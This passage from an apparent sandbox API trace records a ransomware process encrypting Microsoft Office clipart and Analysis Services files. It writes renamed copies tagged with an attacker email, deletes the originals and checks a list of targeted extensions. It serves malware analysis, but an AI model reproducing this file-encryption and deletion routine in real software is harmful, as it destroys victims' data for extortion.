hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.477] SetEndOfFile (hFile=0x220) returned 1 [0052.477] CloseHandle (hObject=0x220) returned 1 [0052.477] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.477] SetEndOfFile (hFile=0x1b4) returned 1 [0052.727] CloseHandle (hObject=0x1b4) returned 1 [0052.727] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.727] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 1 [0052.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.727] lstrlenW (lpString=".doc") returned 4 [0052.727] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.727] lstrlenW (lpString=".docx") returned 5 [0052.727] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0052.728] lstrlenW (lpString=".pdf") returned 4 [0052.728] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.728] lstrlenW (lpString=".xls") returned 4 [0052.728] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.728] lstrlenW (lpString=".xlsx") returned 5 [0052.728] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0052.728] lstrlenW (lpString=".ppt") returned 4 [0052.728] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.728] lstrlenW (lpString=".zip") returned 4 [0052.728] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.728] lstrlenW (lpString=".rar") returned 4 [0052.728] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.728] lstrlenW (lpString=".bz2") returned 4 [0052.728] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.728] lstrlenW (lpString=".7z") returned 3 [0052.728] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.728] lstrlenW (lpString=".dbf") returned 4 [0052.728] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.728] lstrlenW (lpString=".1cd") returned 4 [0052.728] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0052.728] lstrlenW (lpString=".jpg") returned 4 [0052.728] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0053.201] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.220] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0053.242] GetLastError () returned 0x0 [0053.242] ReadFile (in: hFile=0x204, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x1e06, lpOverlapped=0x0) returned 1 [0053.244] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1e10, lpOverlapped=0x0) returned 1 [0053.245] ReadFile (in: hFile=0x204, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.245] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.245] SetEndOfFile (hFile=0x160) returned 1 [0053.245] CloseHandle (hObject=0x160) returned 1 [0053.245] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.245] SetEndOfFile (hFile=0x204) returned 1 [0053.246] CloseHandle (hObject=0x204) returned 1 [0053.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.246] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif")) returned 1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.247] lstrlenW (lpString=".doc") returned 4 [0053.247] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.247] lstrlenW (lpString=".docx") returned 5 [0053.247] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.247] lstrlenW (lpString=".pdf") returned 4 [0053.247] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.247] lstrlenW (lpString=".xls") returned 4 [0053.247] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.247] lstrlenW (lpString=".xlsx") returned 5 [0053.247] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.247] lstrlenW (lpString=".ppt") returned 4 [0053.247] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.247] lstrlenW (lpString=".zip") returned 4 [0053.247] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.247] lstrlenW (lpString=".rar") returned 4 [0053.247] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.247] lstrlenW (lpString=".bz2") returned 4 [0053.247] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.247] lstrlenW (lpString=".7z") returned 3 [0053.247] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.247] lstrlenW (lpString=".dbf") returned 4 [0053.247] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.247] lstrlenW (lpString=".1cd") returned 4 [0053.247] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 63 [0053.247] lstrlenW (lpString=".jpg") returned 4 [0053.248] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.248] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=5253) returned 1 [0053.248] CloseHandle (hObject=0x204) returned 1 [0053.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 0x20 [0053.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.248] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.248] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0053.249] GetLastError () returned 0x0 [0053.249] ReadFile (in: hFile=0x204, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x1485, lpOverlapped=0x0) returned 1 [0053.251] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1490, lpOverlapped=0x0) returned 1 [0053.252] ReadFile (in: hFile=0x204, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.252] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.252] SetEndOfFile (hFile=0x160) returned 1 [0053.252] CloseHandle (hObject=0x160) returned 1 [0053.252] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.252] SetEndOfFile (hFile=0x204) returned 1 [0053.253] CloseHandle (hObject=0x204) returned 1 [0053.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 1 [0053.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.253] lstrlenW (lpString=".doc") returned 4 [0053.253] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.253] lstrlenW (lpString=".docx") returned 5 [0053.254] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.254] lstrlenW (lpString=".pdf") returned 4 [0053.254] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.254] lstrlenW (lpString=".xls") returned 4 [0053.254] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.254] lstrlenW (lpString=".xlsx") returned 5 [0053.254] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.254] lstrlenW (lpString=".ppt") returned 4 [0053.254] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.254] lstrlenW (lpString=".zip") returned 4 [0053.254] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.254] lstrlenW (lpString=".rar") returned 4 [0053.254] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.254] lstrlenW (lpString=".bz2") returned 4 [0053.254] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.254] lstrlenW (lpString=".7z") returned 3 [0053.254] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.254] lstrlenW (lpString=".dbf") returned 4 [0053.254] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.254] lstrlenW (lpString=".1cd") returned 4 [0053.254] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.254] lstrlenW (lpString=".jpg") returned 4 [0053.254] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.263] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2596) returned 1 [0053.263] CloseHandle (hObject=0x208) returned 1 [0053.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif")) returned 0x20 [0053.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.266] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.266] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0053.266] GetLastError () returned 0x0 [0053.266] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xa24, lpOverlapped=0x0) returned 1 [0053.268] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xa30, lpOverlapped=0x0) returned 1 [0053.269] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.269] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.269] SetEndOfFile (hFile=0x160) returned 1 [0053.269] CloseHandle (hObject=0x160) returned 1 [0053.269] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.269] SetEndOfFile (hFile=0x208) returned 1 [0053.270] CloseHandle (hObject=0x208) returned 1 [0053.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.270] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif")) returned 1 [0053.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.271] lstrlenW (lpString=".doc") returned 4 [0053.271] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.271] lstrlenW (lpString=".docx") returned 5 [0053.271] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.271] lstrlenW (lpString=".pdf") returned 4 [0053.271] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.271] lstrlenW (lpString=".xls") returned 4 [0053.271] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.271] lstrlenW (lpString=".xlsx") returned 5 [0053.271] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.271] lstrlenW (lpString=".ppt") returned 4 [0053.271] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.271] lstrlenW (lpString=".zip") returned 4 [0053.271] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.271] lstrlenW (lpString=".rar") returned 4 [0053.271] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.271] lstrlenW (lpString=".bz2") returned 4 [0053.271] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.271] lstrlenW (lpString=".7z") returned 3 [0053.271] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.271] lstrlenW (lpString=".dbf") returned 4 [0053.271] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.271] lstrlenW (lpString=".1cd") returned 4 [0053.271] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63 [0053.271] lstrlenW (lpString=".jpg") returned 4 [0053.272] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.272] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=15308) returned 1 [0053.272] CloseHandle (hObject=0x208) returned 1 [0053.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 0x20 [0053.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.272] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.272] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0053.272] GetLastError () returned 0x0 [0053.272] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x3bcc, lpOverlapped=0x0) returned 1 [0053.274] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x3bd0, lpOverlapped=0x0) returned 1 [0053.275] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.275] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.275] SetEndOfFile (hFile=0x160) returned 1 [0053.275] CloseHandle (hObject=0x160) returned 1 [0053.275] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.275] SetEndOfFile (hFile=0x208) returned 1 [0053.276] CloseHandle (hObject=0x208) returned 1 [0053.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.277] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 1 [0053.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.277] lstrlenW (lpString=".doc") returned 4 [0053.277] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.277] lstrlenW (lpString=".docx") returned 5 [0053.277] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.277] lstrlenW (lpString=".pdf") returned 4 [0053.277] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.277] lstrlenW (lpString=".xls") returned 4 [0053.277] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.277] lstrlenW (lpString=".xlsx") returned 5 [0053.277] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.277] lstrlenW (lpString=".ppt") returned 4 [0053.277] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.277] lstrlenW (lpString=".zip") returned 4 [0053.277] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.277] lstrlenW (lpString=".rar") returned 4 [0053.277] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.277] lstrlenW (lpString=".bz2") returned 4 [0053.277] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.277] lstrlenW (lpString=".7z") returned 3 [0053.277] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.277] lstrlenW (lpString=".dbf") returned 4 [0053.277] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.278] lstrlenW (lpString=".1cd") returned 4 [0053.278] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0053.278] lstrlenW (lpString=".jpg") returned 4 [0053.278] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.278] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=5315) returned 1 [0053.278] CloseHandle (hObject=0x208) returned 1 [0053.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 0x20 [0053.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: 